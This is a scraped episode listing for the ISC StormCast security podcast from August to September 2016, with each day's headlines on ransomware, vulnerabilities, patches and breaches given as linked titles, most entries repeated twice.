Rig Exploit Kit Used to Spread Locky Ransomware https://isc.sans.edu/forums/diary/Rig+Exploit+Kit+from+the+Afraidgate+Campaign/21531/ Facebook Releases osquery for Windows https://blog.trailofbits.com/2016/09/27/windows-network-security-now-easier-with-osquery/ Update Cowrie and "New" Default Password used in Internet Wide Scans https://isc.sans.edu/ssh.html?pw=xc3511 BIND Name Server Update https://kb.isc.org/article/AA-01393/74/CVE-2016-2775%3A-A-query-name-which-is-too-long-can-cause-a-segmentation-fault-in-lwresd.html Various Cisco DoS Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x?product=NonCisco#~Vulnerabilities
9/28/20165 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, September 28th 2016

Back in Time Memory Forensics https://isc.sans.edu/forums/diary/Back+in+Time+Memory+Forensics/21527/ Cameras Responsible For Large DDoS Attacks https://twitter.com/olesovhcom/status/779297257199964160 Google Releases CSP Support Tools https://csp-evaluator.withgoogle.com https://chrome.google.com/webstore/detail/csp-mitigator Microsoft Launches "fuzzing-as-a-service" https://www.microsoft.com/en-us/springfield/
9/28/20165 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, September 28th 2016

Back in Time Memory Forensics https://isc.sans.edu/forums/diary/Back+in+Time+Memory+Forensics/21527/ Cameras Responsible For Large DDoS Attacks https://twitter.com/olesovhcom/status/779297257199964160 Google Releases CSP Support Tools https://csp-evaluator.withgoogle.com https://chrome.google.com/webstore/detail/csp-mitigator Microsoft Launches "fuzzing-as-a-service" https://www.microsoft.com/en-us/springfield/
9/28/20165 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, September 27th 2016

Decompiling P-Code https://isc.sans.edu/forums/diary/VBA+and+Pcode/21521/ Lenovo To Add FIDO Compliant Fingerprint Reader http://www.theregister.co.uk/2016/09/26/intel_and_lenovo_give_the_finger_to_passwords_with_fido/ More Details On Simpler Password Hasing in iOS 10 https://twitter.com/thorsheim/status/779207177416351744 Mozilla to Remove WoSign and StartCom From Trusted List https://docs.google.com/document/d/1C6BlmbeQfn4a9zydVi2UvjBGv6szuSB4sMYUcVrR8vQ/preview
9/26/20166 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, September 27th 2016

Decompiling P-Code https://isc.sans.edu/forums/diary/VBA+and+Pcode/21521/ Lenovo To Add FIDO Compliant Fingerprint Reader http://www.theregister.co.uk/2016/09/26/intel_and_lenovo_give_the_finger_to_passwords_with_fido/ More Details On Simpler Password Hasing in iOS 10 https://twitter.com/thorsheim/status/779207177416351744 Mozilla to Remove WoSign and StartCom From Trusted List https://docs.google.com/document/d/1C6BlmbeQfn4a9zydVi2UvjBGv6szuSB4sMYUcVrR8vQ/preview
9/26/20166 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, September 26th 2016

Analyzing Malicious .PUB files https://isc.sans.edu/forums/diary/PUB+Analysis/21517/ iOS 10 Backup Passwords Easier to Crack http://blog.elcomsoft.com/2016/09/ios-10-security-weakness-discovered-backup-passwords-much-easier-to-break/ Windows 10 Certificate Pinning of Microsoft Domains http://hexatomium.github.io/2016/09/24/hidden-w10-pins/ IBM Geoblocking Fail For Australian Census http://www.aph.gov.au/DocumentStore.ashx?id=124f22ba-caaa-46ff-899d-7d96851fee3e&subId=414127 97% Of Fortune 1000 Companies Have Leaked Credentials http://info.digitalshadows.com/rs/457-XEY-671/images/CompromisedCredentials-LearnFromtheExposureoftheWorlds1000BiggestCompanies-Download.pdf
9/26/20165 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, September 26th 2016

Analyzing Malicious .PUB files https://isc.sans.edu/forums/diary/PUB+Analysis/21517/ iOS 10 Backup Passwords Easier to Crack http://blog.elcomsoft.com/2016/09/ios-10-security-weakness-discovered-backup-passwords-much-easier-to-break/ Windows 10 Certificate Pinning of Microsoft Domains http://hexatomium.github.io/2016/09/24/hidden-w10-pins/ IBM Geoblocking Fail For Australian Census http://www.aph.gov.au/DocumentStore.ashx?id=124f22ba-caaa-46ff-899d-7d96851fee3e&subId=414127 97% Of Fortune 1000 Companies Have Leaked Credentials http://info.digitalshadows.com/rs/457-XEY-671/images/CompromisedCredentials-LearnFromtheExposureoftheWorlds1000BiggestCompanies-Download.pdf
9/26/20165 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, September 23rd 2016

OpenSSL Security Update https://isc.sans.edu/forums/diary/OpenSSL+Update+Released/21509/ ATM Skimmer Prototypes To Collect Fingerprints https://securelist.com/files/2016/09/16_09_en.pdf Yahoo! Breach Leaks 500M User's Data https://yahoo.tumblr.com/post/150781911849/an-important-message-about-yahoo-user-security
9/22/20165 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, September 23rd 2016

OpenSSL Security Update https://isc.sans.edu/forums/diary/OpenSSL+Update+Released/21509/ ATM Skimmer Prototypes To Collect Fingerprints https://securelist.com/files/2016/09/16_09_en.pdf Yahoo! Breach Leaks 500M User's Data https://yahoo.tumblr.com/post/150781911849/an-important-message-about-yahoo-user-security
9/22/20165 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, September 22nd 2016

Those never-ending waves of Locky Malspam https://isc.sans.edu/forums/diary/Those+neverending+waves+of+Locky+malspam/21505/ Windows Anti Malware Scan Interface (AMSI) http://www.labofapenetrationtester.com/2016/09/amsi.html Cloudflare Intorducing SSL Re-Write https://blog.cloudflare.com/opportunistic-encryption-bringing-http-2-to-the-unencrypted-web/ Australian Police Warns of Malicious USB Sticks https://www.vicpolicenews.com.au/news/harmful-usb-drives-found-in-letterboxes
9/21/20165 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, September 22nd 2016

Those never-ending waves of Locky Malspam https://isc.sans.edu/forums/diary/Those+neverending+waves+of+Locky+malspam/21505/ Windows Anti Malware Scan Interface (AMSI) http://www.labofapenetrationtester.com/2016/09/amsi.html Cloudflare Intorducing SSL Re-Write https://blog.cloudflare.com/opportunistic-encryption-bringing-http-2-to-the-unencrypted-web/ Australian Police Warns of Malicious USB Sticks https://www.vicpolicenews.com.au/news/harmful-usb-drives-found-in-letterboxes
9/21/20165 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, September 21st 2016

MacOS Sierra and Safari 10 Released https://isc.sans.edu/forums/diary/Getting+Ready+for+macOS+Sierra+Upgrade+Securely/21465/ BackConnect BGP Hijacks http://research.dyn.com/2016/09/backconnects-suspicious-bgp-hijacks/ Metasploit Vulnerablity https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md
9/21/20164 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, September 21st 2016

MacOS Sierra and Safari 10 Released https://isc.sans.edu/forums/diary/Getting+Ready+for+macOS+Sierra+Upgrade+Securely/21465/ BackConnect BGP Hijacks http://research.dyn.com/2016/09/backconnects-suspicious-bgp-hijacks/ Metasploit Vulnerablity https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md
9/21/20164 minutes, 57 seconds
Episode Artwork

ISC StormCast for Tuesday, September 20th 2016

Taking Over Facebook Pages http://arunsureshkumar.me/index.php/2016/09/16/facebook-page-takeover-zero-day-vulnerability/ Exchange Auto-Discovery Vulnerability http://www.theregister.co.uk/2016/09/19/ms_exchange_alleged_bug/ Spyware Apps Targeting Travelers Removed From Goolge App Store https://blog.lookout.com/blog/2016/09/16/embassy-spyware-google-play/ Firefox Will Patch HSTS Vulnerability https://threatpost.com/mozilla-patching-firefox-certificate-pinning-vulnerability/120694/ OpenSSL Patch Pre-Announcement https://mta.openssl.org/pipermail/openssl-announce/2016-September/000076.html
9/20/20165 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, September 20th 2016

Taking Over Facebook Pages http://arunsureshkumar.me/index.php/2016/09/16/facebook-page-takeover-zero-day-vulnerability/ Exchange Auto-Discovery Vulnerability http://www.theregister.co.uk/2016/09/19/ms_exchange_alleged_bug/ Spyware Apps Targeting Travelers Removed From Goolge App Store https://blog.lookout.com/blog/2016/09/16/embassy-spyware-google-play/ Firefox Will Patch HSTS Vulnerability https://threatpost.com/mozilla-patching-firefox-certificate-pinning-vulnerability/120694/ OpenSSL Patch Pre-Announcement https://mta.openssl.org/pipermail/openssl-announce/2016-September/000076.html
9/20/20165 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, September 19th 2016

Cisco Issues Advisories for IKEv1 "heartbleed like" Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1 Intercepting OS X Passwords https://www.scriptjunkie.us/2016/09/intercepting-passwords-to-escalate-privileges-on-os-x/ Vulnerabilities Introduced By Converting 32 Bit to 64 Bit https://www.tu-braunschweig.de/Medien-DB/sec/pubs/2016-ccs.pdf HSTS Preload Database and Webservices https://hstspreload.com
9/19/20167 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, September 19th 2016

Cisco Issues Advisories for IKEv1 "heartbleed like" Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1 Intercepting OS X Passwords https://www.scriptjunkie.us/2016/09/intercepting-passwords-to-escalate-privileges-on-os-x/ Vulnerabilities Introduced By Converting 32 Bit to 64 Bit https://www.tu-braunschweig.de/Medien-DB/sec/pubs/2016-ccs.pdf HSTS Preload Database and Webservices https://hstspreload.com
9/19/20167 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, September 16th 2016

Locky Ransomware Updates https://blog.avira.com/locky-ransomware-goes-autopilot/ https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground https://isc.sans.edu/forums/diary/Is+2+out+of+3+good+enough+for+AntiMalware/21485/ Critical Update For Cisco WebEx Server https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160914-wem Dualtoy Malware Attacks iOS and Android http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/ Certificate Pinning Issue in Firefox/Tor Browser https://hackernoon.com/tor-browser-exposed-anti-privacy-implantation-at-mass-scale-bd68e9eb1e95#.9jnte0u52
9/16/20165 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, September 16th 2016

Locky Ransomware Updates https://blog.avira.com/locky-ransomware-goes-autopilot/ https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground https://isc.sans.edu/forums/diary/Is+2+out+of+3+good+enough+for+AntiMalware/21485/ Critical Update For Cisco WebEx Server https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160914-wem Dualtoy Malware Attacks iOS and Android http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/ Certificate Pinning Issue in Firefox/Tor Browser https://hackernoon.com/tor-browser-exposed-anti-privacy-implantation-at-mass-scale-bd68e9eb1e95#.9jnte0u52
9/16/20165 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, September 15th 2016

Exploit Attempts for Drupal RESTWS Module Vulnerablity https://isc.sans.edu/forums/diary/Exploit+Attempts+for+Drupal+RESTWS+x+Module+Vulnerability/21481/ Google France XSS Vulnerability https://sysdream.com/news/lab/2016-09-12-cross-site-scripting-vulnerability-found-on-www-google-fr/ Pokemon Go Continues to Lead to Malware https://securelist.com/blog/mobile/76081/rooting-pokemons-in-google-play-store/ VMWare Update Fixes Escape Vulnerablity https://www.vmware.com/security/advisories/VMSA-2016-0014.html
9/15/20165 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, September 15th 2016

Exploit Attempts for Drupal RESTWS Module Vulnerablity https://isc.sans.edu/forums/diary/Exploit+Attempts+for+Drupal+RESTWS+x+Module+Vulnerability/21481/ Google France XSS Vulnerability https://sysdream.com/news/lab/2016-09-12-cross-site-scripting-vulnerability-found-on-www-google-fr/ Pokemon Go Continues to Lead to Malware https://securelist.com/blog/mobile/76081/rooting-pokemons-in-google-play-store/ VMWare Update Fixes Escape Vulnerablity https://www.vmware.com/security/advisories/VMSA-2016-0014.html
9/15/20165 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, September 14th 2016

Microsoft Patches https://isc.sans.edu/mspatchdays.html?viewday=2016-09-13 Adobe Air Patches https://helpx.adobe.com/security/products/air/apsb16-31.html iOS 10 Update https://isc.sans.edu/forums/diary/Apple+iOS+10+and+1001+Released/21473/
9/14/20169 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, September 14th 2016

Microsoft Patches https://isc.sans.edu/mspatchdays.html?viewday=2016-09-13 Adobe Air Patches https://helpx.adobe.com/security/products/air/apsb16-31.html iOS 10 Update https://isc.sans.edu/forums/diary/Apple+iOS+10+and+1001+Released/21473/
9/14/20169 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, September 13th 2016

If it's Free, YOU are the Product https://isc.sans.edu/forums/diary/If+its+Free+YOU+are+the+Product/21469/ Weak MySQL Configurations Can Lead To Privilege Escalation http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html Full Disk Encryption Ransomware https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho?trk=prof-post
9/13/20166 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, September 13th 2016

If it's Free, YOU are the Product https://isc.sans.edu/forums/diary/If+its+Free+YOU+are+the+Product/21469/ Weak MySQL Configurations Can Lead To Privilege Escalation http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html Full Disk Encryption Ransomware https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho?trk=prof-post
9/13/20166 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, September 12th 2016

Upgrading Security to MacOS Sierra https://isc.sans.edu/forums/diary/Getting+Ready+for+macOS+Sierra+Upgrade+Securely/21465/ PCI PIN Transation Security / Point of Interaction Update https://www.pcisecuritystandards.org/documents/PCI_PTS_POI_SRs_v5.pdf IMAPS Scans https://isc.sans.edu/forums/diary/Ongoing+IMAP+Scan+Anyone+Else/21463/
9/12/20166 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, September 12th 2016

Upgrading Security to MacOS Sierra https://isc.sans.edu/forums/diary/Getting+Ready+for+macOS+Sierra+Upgrade+Securely/21465/ PCI PIN Transation Security / Point of Interaction Update https://www.pcisecuritystandards.org/documents/PCI_PTS_POI_SRs_v5.pdf IMAPS Scans https://isc.sans.edu/forums/diary/Ongoing+IMAP+Scan+Anyone+Else/21463/
9/12/20166 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, September 9th 2016

Spikes in SNMP Traffic: Looking for PCAPs https://isc.sans.edu/forums/diary/Curious+SNMP+Traffic+Spike/21457/ New Version of Wireshark Released https://www.wireshark.org/docs/relnotes/wireshark-2.2.0.html XEN Hypervisor Vulnerabilities https://xenbits.xen.org/xsa/ Google Moving Ahead With HTTP Phaseout https://security.googleblog.com/2016/09/moving-towards-more-secure-web.html Old Windows Media Player DRM Feature Still Used To Install Malware http://blog.cyren.com/articles/windows-media-player-drm-feature-used-for-malware-delivery-again.html SEC503 Intrusion Detection in Depth Online Training https://www.sans.org/vlive/details/sec503-19sep2016-johannes-ullrich-phd
9/8/20167 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, September 9th 2016

Spikes in SNMP Traffic: Looking for PCAPs https://isc.sans.edu/forums/diary/Curious+SNMP+Traffic+Spike/21457/ New Version of Wireshark Released https://www.wireshark.org/docs/relnotes/wireshark-2.2.0.html XEN Hypervisor Vulnerabilities https://xenbits.xen.org/xsa/ Google Moving Ahead With HTTP Phaseout https://security.googleblog.com/2016/09/moving-towards-more-secure-web.html Old Windows Media Player DRM Feature Still Used To Install Malware http://blog.cyren.com/articles/windows-media-player-drm-feature-used-for-malware-delivery-again.html SEC503 Intrusion Detection in Depth Online Training https://www.sans.org/vlive/details/sec503-19sep2016-johannes-ullrich-phd
9/8/20167 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, September 8th 2016

DShield Blocklist Update https://isc.sans.edu/forums/diary/Updated+DShield+Blocklist/21453/ Fortinet FortiWAN Load Balancer Mulitple Unpatched Vulnerabilities http://www.kb.cert.org/vuls/id/724487 Rapid7 Published NSM Vulnerabilities http://www.theregister.co.uk/2016/09/07/natwork_magement_vulns/ OPM Breached by Two Different Attackers https://oversight.house.gov/wp-content/uploads/2016/09/The-OPM-Data-Breach-How-the-Government-Jeopardized-Our-National-Security-for-More-than-a-Generation.pdf
9/8/20165 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, September 8th 2016

DShield Blocklist Update https://isc.sans.edu/forums/diary/Updated+DShield+Blocklist/21453/ Fortinet FortiWAN Load Balancer Mulitple Unpatched Vulnerabilities http://www.kb.cert.org/vuls/id/724487 Rapid7 Published NSM Vulnerabilities http://www.theregister.co.uk/2016/09/07/natwork_magement_vulns/ OPM Breached by Two Different Attackers https://oversight.house.gov/wp-content/uploads/2016/09/The-OPM-Data-Breach-How-the-Government-Jeopardized-Our-National-Security-for-More-than-a-Generation.pdf
9/8/20165 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, September 7th 2016

Google September Android Security Update https://source.android.com/security/bulletin/2016-09-01.html Hard Coded Password / Key Issue Gets Worse http://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html Snagging Credentials From Locked Machines (Windows and OS X) https://room362.com/post/2016/snagging-creds-from-locked-machines/
9/6/20165 minutes, 51 seconds
Episode Artwork

ISC StormCast for Wednesday, September 7th 2016

Google September Android Security Update https://source.android.com/security/bulletin/2016-09-01.html Hard Coded Password / Key Issue Gets Worse http://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html Snagging Credentials From Locked Machines (Windows and OS X) https://room362.com/post/2016/snagging-creds-from-locked-machines/
9/6/20165 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, September 6th 2016

Apple Patches OS X and Safari for Trident/Pegasus Vulnerabilities https://support.apple.com/en-us/HT201222 Malware Delivered via ".pub" Files https://isc.sans.edu/forums/diary/Malware+Delivered+via+pub+Files/21443/ Sophos Anti Virus False Positive Causes Blue Screen of Death https://community.sophos.com/kb/en-us/125000 Adobe Reviving Flash for Linux https://blogs.adobe.com/flashplayer/2016/08/beta-news-flash-player-npapi-for-linux.html Google Patches Nexuse 5X Vulnerability https://securityintelligence.com/undocumented-patched-vulnerability-in-nexus-5x-allowed-for-memory-dumping-via-usb/
9/6/20165 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, September 6th 2016

Apple Patches OS X and Safari for Trident/Pegasus Vulnerabilities https://support.apple.com/en-us/HT201222 Malware Delivered via ".pub" Files https://isc.sans.edu/forums/diary/Malware+Delivered+via+pub+Files/21443/ Sophos Anti Virus False Positive Causes Blue Screen of Death https://community.sophos.com/kb/en-us/125000 Adobe Reviving Flash for Linux https://blogs.adobe.com/flashplayer/2016/08/beta-news-flash-player-npapi-for-linux.html Google Patches Nexuse 5X Vulnerability https://securityintelligence.com/undocumented-patched-vulnerability-in-nexus-5x-allowed-for-memory-dumping-via-usb/
9/6/20165 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, September 2nd 2016

Malware Using Maxmind For Geolocation https://isc.sans.edu/forums/diary/Maxmindcom+Abused+As+AntiAnalysis+Technique/21435/ Content Security Policy of Limited Use in Real World https://research.google.com/pubs/pub45542.html CryptWare Bitlocker Enhancement Vulnerability https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20160831-0_CryptWare_CryptoPro_Manipulation_of_pre-boot_authentication_v10.txt Google Releases Chrome 53 http://googlechromereleases.blogspot.com/2016/08/stable-channel-update-for-desktop_31.html
9/1/20164 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, September 2nd 2016

Malware Using Maxmind For Geolocation https://isc.sans.edu/forums/diary/Maxmindcom+Abused+As+AntiAnalysis+Technique/21435/ Content Security Policy of Limited Use in Real World https://research.google.com/pubs/pub45542.html CryptWare Bitlocker Enhancement Vulnerability https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20160831-0_CryptWare_CryptoPro_Manipulation_of_pre-boot_authentication_v10.txt Google Releases Chrome 53 http://googlechromereleases.blogspot.com/2016/08/stable-channel-update-for-desktop_31.html
9/1/20164 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, September 1st 2016

Abobe ColdFusion Update https://helpx.adobe.com/security/products/coldfusion/apsb16-30.html OS X Bittorrent Client Transmission Backdoored http://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/ Arrested Lurk Hacking Group Likely Developed Angler Exploit Kit https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/ Vulnerable REDIS Instances Used by Fake Ransomware https://duo.com/blog/over-18-000-redis-instances-targeted-by-fake-ransomware
9/1/20165 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, September 1st 2016

Abobe ColdFusion Update https://helpx.adobe.com/security/products/coldfusion/apsb16-30.html OS X Bittorrent Client Transmission Backdoored http://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/ Arrested Lurk Hacking Group Likely Developed Angler Exploit Kit https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/ Vulnerable REDIS Instances Used by Fake Ransomware https://duo.com/blog/over-18-000-redis-instances-targeted-by-fake-ransomware
9/1/20165 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, August 31st 2016

Today's Locky Variant Arrives as a Windows Script File https://isc.sans.edu/forums/diary/Todays+Locky+Variant+Arrives+as+a+Windows+Script+File/21423/ OneLogin Breached and Secure Notes Lost https://www.onelogin.com/blog/august-2016-incident USB Memory Stick Can Be Used to Exfiltrate Data Wireless http://cyber.bgu.ac.il/t/USBee.pdf Jail Break App in Apple's App Store https://www.reddit.com/r/jailbreak/comments/506eyp/release_ppjailbreak_on_the_appstore/
8/31/20164 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, August 31st 2016

Today's Locky Variant Arrives as a Windows Script File https://isc.sans.edu/forums/diary/Todays+Locky+Variant+Arrives+as+a+Windows+Script+File/21423/ OneLogin Breached and Secure Notes Lost https://www.onelogin.com/blog/august-2016-incident USB Memory Stick Can Be Used to Exfiltrate Data Wireless http://cyber.bgu.ac.il/t/USBee.pdf Jail Break App in Apple's App Store https://www.reddit.com/r/jailbreak/comments/506eyp/release_ppjailbreak_on_the_appstore/
8/31/20164 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, August 30th 2016

CA WoSign Law Validation Policy https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/k9PBmyLCi8I FBI Warns Of Vulnerabilities in State Election Websites https://www.scribd.com/document/322473050/FBI-Flash-Aug-2016#from_embed Bug in "Keeper" Password Safe Allows Attackers to Steal Passwords https://bugs.chromium.org/p/project-zero/issues/detail?id=917 Bank ATMs Compromised via Malicious EMV Chip https://www.fireeye.com/blog/threat-research/2016/08/ripper_atm_malwarea.html
8/30/20165 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, August 30th 2016

CA WoSign Law Validation Policy https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/k9PBmyLCi8I FBI Warns Of Vulnerabilities in State Election Websites https://www.scribd.com/document/322473050/FBI-Flash-Aug-2016#from_embed Bug in "Keeper" Password Safe Allows Attackers to Steal Passwords https://bugs.chromium.org/p/project-zero/issues/detail?id=917 Bank ATMs Compromised via Malicious EMV Chip https://www.fireeye.com/blog/threat-research/2016/08/ripper_atm_malwarea.html
8/30/20165 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, August 29th 2016

Spam with Obfuscated Javascript https://isc.sans.edu/forums/diary/Spam+with+Obfuscated+Javascript/21415/ Another Day - Another Ransomware Sample https://isc.sans.edu/forums/diary/Another+Day+Another+Ransomware+Sample/21413/ OpenSSL Update https://www.openssl.org/news/openssl-1.1.0-notes.html Opera Sync Server Breached https://www.opera.com/blogs/security/2016/08/opera-server-breach-incident/ Fake Windows Update Delivers Ransomware http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/ Dropbox Resets Old Passwords After Data Leak https://www.dropbox.com/help/9257?oref=e
8/29/20165 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, August 29th 2016

Spam with Obfuscated Javascript https://isc.sans.edu/forums/diary/Spam+with+Obfuscated+Javascript/21415/ Another Day - Another Ransomware Sample https://isc.sans.edu/forums/diary/Another+Day+Another+Ransomware+Sample/21413/ OpenSSL Update https://www.openssl.org/news/openssl-1.1.0-notes.html Opera Sync Server Breached https://www.opera.com/blogs/security/2016/08/opera-server-breach-incident/ Fake Windows Update Delivers Ransomware http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/ Dropbox Resets Old Passwords After Data Leak https://www.dropbox.com/help/9257?oref=e
8/29/20165 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, August 26th 2016

Out-of-Band iOS Patch Fixes 0-Day Vulnerabilities https://isc.sans.edu/forums/diary/OutofBand+iOS+Patch+Fixes+0Day+Vulnerabilities/21409/ Malicious E-Mail Installs Proxy File to Redirect Requests to santander.com.br https://isc.sans.edu/forums/diary/OutofBand+iOS+Patch+Fixes+0Day+Vulnerabilities/21409/ Nginx DNS Resolver Issue (Windows Only) http://blog.zorinaq.com/nginx-resolver-vulns/ Wifi Signals Can Be Used for Keystroke Sniffing https://www.sigmobile.org/mobicom/2015/papers/p90-aliA.pdf
8/25/20166 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, August 26th 2016

Out-of-Band iOS Patch Fixes 0-Day Vulnerabilities https://isc.sans.edu/forums/diary/OutofBand+iOS+Patch+Fixes+0Day+Vulnerabilities/21409/ Malicious E-Mail Installs Proxy File to Redirect Requests to santander.com.br https://isc.sans.edu/forums/diary/OutofBand+iOS+Patch+Fixes+0Day+Vulnerabilities/21409/ Nginx DNS Resolver Issue (Windows Only) http://blog.zorinaq.com/nginx-resolver-vulns/ Wifi Signals Can Be Used for Keystroke Sniffing https://www.sigmobile.org/mobicom/2015/papers/p90-aliA.pdf
8/25/20166 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, August 25th 2016

Juniper/Cisco Updates Regarding #NSA Exploits https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10605&actp=search http://arstechnica.com/security/2016/08/nsa-linked-cisco-exploit-poses-bigger-threat-than-previously-thought/ Wildfire Ransomware Takedown and Key Recovery https://blogs.mcafee.com/mcafee-labs/wildfire-ransomware-extinguished-tool-nomoreransom-unlock-files-free/ "Sandscout" tool to exploit iOS Sandbox Vulnerabilities http://www.maclife.de/news/sandscout-forscher-tu-darmstadt-finden-sicherheitsluecken-ios-sandbox-10081401.html (sorry, only in German) Sweet32 Birthday Attack against 3DES and Blowfish (https/openvpn) http://www.maclife.de/news/sandscout-forscher-tu-darmstadt-finden-sicherheitsluecken-ios-sandbox-10081401.html
8/24/20166 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, August 25th 2016

Juniper/Cisco Updates Regarding #NSA Exploits https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10605&actp=search http://arstechnica.com/security/2016/08/nsa-linked-cisco-exploit-poses-bigger-threat-than-previously-thought/ Wildfire Ransomware Takedown and Key Recovery https://blogs.mcafee.com/mcafee-labs/wildfire-ransomware-extinguished-tool-nomoreransom-unlock-files-free/ "Sandscout" tool to exploit iOS Sandbox Vulnerabilities http://www.maclife.de/news/sandscout-forscher-tu-darmstadt-finden-sicherheitsluecken-ios-sandbox-10081401.html (sorry, only in German) Sweet32 Birthday Attack against 3DES and Blowfish (https/openvpn) http://www.maclife.de/news/sandscout-forscher-tu-darmstadt-finden-sicherheitsluecken-ios-sandbox-10081401.html
8/24/20166 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, August 24th 2016

Voicemail Message Notification Deliver Ransomware https://isc.sans.edu/forums/diary/Voice+Message+Notifications+Deliver+Ransomware/21397/ Updates Microsoft Word Bulletin https://support.microsoft.com/en-us/kb/3179163 Multiple BTS Software Vulnerabilities https://blog.zimperium.com/analysis-of-multiple-vulnerabilities-in-different-open-source-bts-products/ Popular HTTP Proxies Vulnerable to Cache Poisoning https://hostoftroubles.com
8/24/20165 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, August 24th 2016

Voicemail Message Notification Deliver Ransomware https://isc.sans.edu/forums/diary/Voice+Message+Notifications+Deliver+Ransomware/21397/ Updates Microsoft Word Bulletin https://support.microsoft.com/en-us/kb/3179163 Multiple BTS Software Vulnerabilities https://blog.zimperium.com/analysis-of-multiple-vulnerabilities-in-different-open-source-bts-products/ Popular HTTP Proxies Vulnerable to Cache Poisoning https://hostoftroubles.com
8/24/20165 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, August 23rd 2016

Multiple Vulnerabilities in BHU Router http://blog.ioactive.com/2016/08/multiple-vulnerabilities-in-bhu-wifi.html Smart Socket Vulnerability https://labs.bitdefender.com/2016/08/hackers-can-use-smart-sockets-to-shut-down-critical-systems/ Smart Security Cameras are Spying on You http://www.forbes.com/sites/marcwebertobias/2016/08/22/is-your-smart-security-camera-protecting-your-home-or-spying-on-you/#6fb3a6414d1e Veracrypt 1.18a With Limited UEFI Support https://veracrypt.codeplex.com/releases/view/625477
8/23/20165 minutes
Episode Artwork

ISC StormCast for Tuesday, August 23rd 2016

